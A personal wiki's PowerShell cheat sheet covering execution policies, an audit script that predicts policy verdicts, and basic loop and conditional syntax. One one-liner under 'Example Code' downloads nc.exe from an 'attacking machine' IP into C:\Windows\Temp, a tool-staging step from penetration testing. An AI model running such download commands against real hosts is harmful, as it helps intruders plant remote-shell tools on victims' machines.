The gMan nixWiki

Because the mind is made of Teflon...

This is an old revision of the document!


Windows PowerShell

Execution Policies

PowerShell execution policies determine whether you are allowed to run PowerShell (PS) scripts:

  1. Restricted: [default] Blocks all use of PS scripts
  2. AllSigned: Requires PS scripts to be signed by a trusted publisher
  3. RemoteSigned: This is a common “normal” setting in many systems…
    1. Allows any PS script written on the local machine.
    2. But requires downloaded scripts to be signed by a trusted publisher.
  4. Unrestricted: Allows any PS script but prompts you for confirmation on downloaded scripts.
  5. Bypass: Allows any and all PS scripts. Have at it!
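
Added example (not part of the original cheat sheet): an audit sketch that predicts what each policy above would do with a given script, based on its Mark-of-the-Web zone and Authenticode signature. `Test-PolicyVerdict` and the `policy-demo` folder are hypothetical names; treating ZoneId 3 or 4 as "downloaded" and ignoring the trusted-publisher prompt are simplifying assumptions.

```powershell
# Added example: Windows only (Zone.Identifier is an NTFS alternate data stream).
# Test-PolicyVerdict is a hypothetical helper name, not a built-in cmdlet.
function Test-PolicyVerdict {
    param(
        [Parameter(Mandatory)][string]$Path,
        [ValidateSet('Restricted','AllSigned','RemoteSigned','Unrestricted','Bypass')]
        [string]$Policy = (Get-ExecutionPolicy)
    )

    # Mark of the Web: assume ZoneId 3 (Internet) or 4 (Restricted sites) means "downloaded".
    $zone = Get-Content -LiteralPath $Path -Stream Zone.Identifier -ErrorAction SilentlyContinue |
        Select-String -Pattern '^ZoneId=(\d)' |
        Select-Object -First 1 |
        ForEach-Object { [int]$_.Matches[0].Groups[1].Value }
    $downloaded = $zone -in 3, 4

    # 'Valid' means the file hash matches and the certificate chain is trusted.
    $signed = (Get-AuthenticodeSignature -LiteralPath $Path).Status -eq 'Valid'

    $verdict = switch ($Policy) {
        'Restricted'   { 'Blocked' }
        'AllSigned'    { if ($signed) { 'Allowed' } else { 'Blocked' } }
        'RemoteSigned' { if (-not $downloaded -or $signed) { 'Allowed' } else { 'Blocked' } }
        'Unrestricted' { if ($downloaded) { 'Prompt' } else { 'Allowed' } }
        'Bypass'       { 'Allowed' }
    }

    [pscustomobject]@{
        Path = $Path; Policy = $Policy; Downloaded = $downloaded
        ValidSignature = $signed; Verdict = $verdict
    }
}

# Show which scope sets the effective policy (highest precedence is listed first).
Get-ExecutionPolicy -List

# Constructed sample: a local script and a copy tagged as if it came from the Internet zone.
$dir = Join-Path $env:TEMP 'policy-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
Set-Content -Path "$dir\local.ps1" -Value 'Write-Host "local"'
Set-Content -Path "$dir\downloaded.ps1" -Value 'Write-Host "downloaded"'
Set-Content -Path "$dir\downloaded.ps1" -Stream Zone.Identifier -Value "[ZoneTransfer]`r`nZoneId=3"

foreach ($p in 'Restricted','AllSigned','RemoteSigned','Unrestricted','Bypass') {
    Get-ChildItem "$dir\*.ps1" | ForEach-Object { Test-PolicyVerdict -Path $_.FullName -Policy $p }
}
```

Both sample scripts are unsigned, so only the `RemoteSigned` and `Unrestricted` rows differ between them.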

Example Code

A very useful one-liner to download a file (nc.exe) from an attacking machine (IP 192.168.77.128) and save it in C:\Windows\Temp using the same name:

(New-Object System.Net.WebClient).DownloadFile("http://192.168.77.128/nc.exe", "C:\Windows\Temp\nc.exe")

Example: For Loop

Write-Host "Hello world!"

# Count up by one...
for ($var=1; $var -le 5; $var++)
{
    Write-Host "The value of var is: $var"
}

# Count up by two...
for ($var=0; $var -le 10; $var=$var+2)
{
    Write-Host "The value of var is: $var"
}

Example: Conditional

$a = 2
if ( $a -gt 2 )
{
    Write-Host "The value $a is greater than 2."
}
elseif ( $a -eq 2 )
{
    Write-Host "The value $a is equal to 2."
}
else
{
    Write-Host ( "The value of $a is less than 2" + " or was not created or initialized." )
}

cheat_sheets_ps.1672357037.txt.gz · Last modified: by gman